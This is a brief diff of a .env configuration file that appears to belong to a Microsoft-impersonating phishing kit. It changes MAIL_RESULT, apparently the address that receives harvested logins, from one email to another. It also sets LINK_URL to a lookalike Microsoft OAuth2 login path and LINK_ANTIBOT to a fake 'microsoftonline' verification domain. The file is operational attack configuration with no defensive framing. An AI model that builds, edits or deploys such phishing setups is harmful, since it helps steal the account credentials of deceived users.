--- a/.env
+++ b/.env
@@ -1,3 +1,3 @@
-MAIL_RESULT=1507710974@etlgr.com
+MAIL_RESULT=admin@tademaxoption.xyz
 LINK_URL=https://login.i.0xf3c67f0f8e10a427d3f8d8db32761f1ebabe40c8.id/common/oauth2/v2.0
 LINK_ANTIBOT=https://microsoftonline.verify-status.online/login/
